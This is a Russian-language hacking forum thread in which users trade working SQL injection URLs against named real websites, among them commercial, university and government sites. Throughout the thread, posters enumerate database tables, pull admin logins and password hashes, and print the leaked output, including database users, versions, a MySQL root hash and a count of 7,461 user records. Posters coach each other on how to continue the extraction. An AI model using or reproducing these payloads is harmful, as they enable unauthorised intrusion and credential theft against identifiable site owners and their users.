SQL Инъекции

http://www.themetalcircus.com/noticiadia.php?id=-1+union+select+1,login_name,3,4,5,6,7,8,9,10,11,12,13,14+loginform/*
http://www.linspire.com/lindows_news_pressreleases_archives.php?id=-1+union+select+user(),2+from+login/*
PR=8/10
http://www.gametrailers.com/gamepage.php?id=-1+union+select+1,2,3,user(),5,6,7,8,9,10,11,database(),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29/*
PR=5/10


http://www.michaelpollan.com/article.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10+from+articles/*

http://michaelyoun.com/index.php?id=336+union+select+1,concat(login,char(58),pass),3,4,5,6+from+users/*
ЧТО ЭТО? (последняя)

 

Интернет провайдер

Code:

http://trytek.ru/tarifs.php?go=chasn&act=view&id='

Code:

http://trytek.ru/tarifs.php?go=chasn&act=view&id='%20union%20select%201,2,3,4,5,6,7,8,9,10/*

Code:

http://trytek.ru/tarifs.php?go=chasn&act=view&id='%20union%20select%201,concat(column_name,0x3a,table_name,0x3a),3,4,5,6,7,8,9,10%20from%20INFORMATION_SCHEMA.COLUMNS%20limit%201,1/*

Дальше сами )

 

"/

 

Code:

http://www.crystalmoby.com/shop.php?id=-15+union+select+1,2,3,4,5,6,7/*

Code:

http://www.do4money.com/directory.php?ax=list&sub=7&cat_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,0x3a,password),4,5,6,7,8,9,10, 11,12,13/**/FROM/**/admin/*

 

Code:

http://www.tea.co.uk/index.php?pgId=18+and+1=2+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12,13,14+from+information_schema.tables/*

 

раскрутил:

Code:

http://www.tea.co.uk/index.php?pgId=18+and+1=2+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12,13,14+from+information_schema.tables+limit+66,1/*

такбличка юзерс.

колумны:

username:

Code:

http://www.tea.co.uk/index.php?pgId=18+and+1=2+union+select+1,2,column_name,4,5,6,7,8,9,10,11,12,13,14+from+INFOrMATION_SCHEMA.COLUMnS+WHERE+TABLE_NAME='users'+limit+9,1/*

pword:

Code:

http://www.tea.co.uk/index.php?pgId=18+and+1=2+union+select+1,2,column_name,4,5,6,7,8,9,10,11,12,13,14+from+INFOrMATION_SCHEMA.COLUMnS+WHERE+TABLE_NAME='users'+limit+10,1/*

вывод:... только почемуто пусто... мб ни 1 юзера?

Code:

http://www.tea.co.uk/index.php?pgId=18+and+1=2+union+select+1,pword,username,4,5,6,7,8,9,10,11,12,13,14+from+users/*

 

Пусто у тебя в голове))

Code:

http://www.tea.co.uk/index.php?pgId=11111111111111111+union+select+1,concat(username,char(58),pword),5,4,5,6,7,8,9,10,11,12,13,14+from+users+where+length(username)>=1+limit+0,1/*

Получаем:

[email protected]:[email protected]

и т.д. записей много:

Code:

http://www.tea.co.uk/index.php?pgId=11111111111111111+union+select+1,count(concat(username,char(58),pword)),5,4,5,6,7,8,9,10,11,12,13,14+from+users+where+length(username)>=1+limit+0,1/*

Записей: 7461

 

Объяснял новечку скули и случайно наткнулся на .edu :

Code:

http://www.antioch-college.edu/news/releases/index.php?id=-178%20UNION%20SELECT%201,2,user(),version(),database(),6,7,8,9,10,11,12/*

 

otdohni.ws
код:http://otdohni.ws/e107_plugins/arcade_menu/arcades_dvd.php?id=-18%27+union+select+1,concat(table_name,0x3a,column_name),3,4,5+from+information_schema.columns/*

код:http://otdohni.ws/e107_plugins/arcade_menu/arcades_dvd.php?id=-18%27+union+select+1,concat_ws(0x3a,user_password,user_name,user_loginname,user_email),3,4,5+from+denisvd_db01.e107_user/*

код:http://otdohni.ws/e107_plugins/arcade_menu/arcades_dvd.php?id=-18%27+union+select+1,concat_ws(0x3a,ID_MEMBER,realName,memberName,memberIP,memberIP2,MSN,emailAddress,hideEmail,YIM,AIM,ICQ,passwd,passwordSalt),%27CRACKed%20by%20fobofob%27,4,5+from+doctor_forum.backup_smf_members+limit+115,1/*

а вот тут не понял что за странность с лимитом

код:http://otdohni.ws/e107_plugins/arcade_menu/arcades_dvd.php?id=-18%27+union+select+1,concat_ws(0x3a,user_id,username,password,email),3,4,5+from+doctor_almi.av_users/*

дальше не рыл...

 

Если не ошибаюсь, то солёный хэш.

 

пользуй тогда не лимит, а where

 

http://stepbystep.htmlbook.ru/?id=24+UNION+SELECT+1,2,3/*
Смотрим в самый низ, там где каменты, там наше "блюдо"
Версия 4 какие могут быть имена таблиц на HTML мануале, незнаю...

 

Code:

http://www.edipi.com/guidasw/aziende.php?nzl=N&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,concat(user(),0x3a,version(),0x3a,database()),15,16,17,18 ,19/*

[email protected]:4.0.24_Debian-10sarge1:edipi_com25466

Code:

http://wwwdoska.ru/idv.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat(user(),0x3a,version(),0x3a,database()),10,11,12,13,14,15,16,1 7,18,19,20/*

wwwdoska_new@localhost:4.1.22-standard:wwwdoska_new

Code:

http://www.isis.or.ug/news.php?p=5&id=99999+union+select+1,concat(user(),0x3a,version(),0x3a,database( )),3,4,5,6,7,8,9/*

isis@localhost:4.1.20:isis

Code:

http://ss.mak.ac.ug/index.php?act=news&full=true&id=9999+union+select+concat(user(),0x3a,version( ),0x3a,database()),2/*

maktus1_ss@localhost:4.1.22-standard:maktus1_ss

Code:

http://www.unbs.go.ug/news.php?id=-1+union+select+concat(user(),0x3a,version(),0x3a,database()),2,3,4/*

unbsdbadmin@localhost:4.1.21:unbs_go_ug

Code:

http://www.nic.co.ug/pg.php?p=media&s=news&Id=9999+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5/*

niccou_niccou@localhost:4.1.22-standard:niccou_

 

http://poderedomex.com/notas.asp?nota_id=1+and+1=convert(int,@@version)--

http://www.yard-saler.com/store_info.php?id=999999%20union/**/select/**/0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,admin_name,pwd,18,19,20,21,22/**/from/**/sbclassified_admin/*

http://www.e商店.com/en/store_info.php?id=999999%20union/**/select/**/0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,admin_name,pwd,18,19,20,21,22/**/from/**/sbclassified_admin/*

http://www.adsjax.com/store_info.php?id=999999%20union/**/select/**/0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,admin_name,pwd,18,19,20,21,22/**/from/**/sbclassified_admin/*

http://www.imadspace.com/store_info.php?id=999999%20union/**/select/**/0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,admin_name,pwd,18,19,20,21,22/**/from/**/sbclassified_admin/*

http://racecarbroker.net/store_info.php?id=999999%20union/**/select/**/0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,admin_name,pwd,18,19,20,21,22/**/from/**/sbclassified_admin/*

 

Письмо админам ресурса.. было отправлено более недели назад

з.ы. админы уведомлены

 

Code:

http://www.translation.net/kb/index.php?ToDo=browse&catId=-10+union+select+1,2,3,4,5,6,7/*

 

Code:

http://bpm.cult.bg/medusa/logs/?id=-1+union+select+concat(user(),0x3a,version(),0x3a,database()),2/*

bpmsIt3@localhost:4.1.22-log:bpmSite

Code:

http://www.eunews.bg/index.en.php?cmd=singlenews&id=-1+union+select+concat(user(),0x3a,version(),0x3a,database()),2,3,4,5,6/*

eunews@localhost:5.0.41-Debian_1-log:eunews

Code:

http://www.humboldt.org.ni/publicaciones.php?id=-1+union+select+1,2,concat(user(),0x3a,version(),0x3a,database())/*

humboldt_admin@localhost:4.1.22-standard:humboldt_cms

Code:

http://www.sandra-kuehn.de/aquarium/pics.php?id=9999+union+select+1,2,3,4,aes_decrypt(aes_encrypt(version(),0x71),0x71)/*

Code:

http://www.apotheose.net/pics.php?id=-1+union+select+1,2,3,4,concat(user(),0x3a,version(),0x3a,database())/*

user09710@web04:4.1.20-log:db0971002

Code:

http://www.ipetra.ru/portfolio/pics.php?id=-1/**/union/**/select/**/1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6/*

ipetra_ru@localhost:5.0.32-Debian_7etch1-log:ipetra_ru

Code:

http://www.stchristopherclub.com/sub/pics.php?id=-1+union+select+1,concat(user,0x3a,password),3,4+from+mysql.user/*

Code:

http://www.sws-yachts.com/pics.php?pagina=fotoboatyard&Id=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6/*

sws-yachts@localhost:4.1.20:sws-yachts

 

аськи:

Code:

http://bpm.cult.bg/medusa/logs/?id=-1+union+select+icq,2+from+users/*

логинов с пассами ненашёл

тотже сайт, но скуля в др месте, циферок бобольше )
версия таже, таблы теже ..

Code:

http://bpm.cult.bg/users/profile.php?uid=-774+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+users/*

 

root:*2EFC34FE6B4EFAE9BA1829EE7E8E300FB346E61C
http://www.nea.gov/honors/heritage/fellows/fellow.php?id=1983_0'+union+select+1,AES_DECRYPT(AES_ENCRYPT(user(),0x17),0x17),3,4,5,6,7,8,9,10,11,12,13,14,15+from+mysql.user/*
http://www.lanl.gov/opportunities/techtransfer/dsp_technology.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/*

 

1)находим табличку:

Code:

http://www.eunews.bg/index.en.php?cmd=singlenews&id=-1+union+select+table_name,2,3,4,5,6+from+INFORMATION_SCHEMA.TABLES+limit+17,1/*

2)сделаем через жопу, т.к. вначале ошиблись)

Code:

http://www.eunews.bg/index.en.php?cmd=singlenews&id=-1+union+select+COLUMN_NAME,Table_name,3,4,5,6+from+INFORMATION_SCHEMA.COLUMNS+limit+[COLOR=Red]179[/COLOR],1

Code:

http://www.eunews.bg/index.en.php?cmd=singlenews&id=-1+union+select+COLUMN_NAME,Table_name,3,4,5,6+from+INFORMATION_SCHEMA.COLUMNS+limit+178,1

3)выводим.
логин:

Code:

http://www.eunews.bg/index.en.php?cmd=singlenews&id=-1+union+select+alias,2,3,4,5,6+from+administrators/*

пасс:

Code:

http://www.eunews.bg/index.en.php?cmd=singlenews&id=-1+union+select+password,2,3,4,5,6+from+administrators/*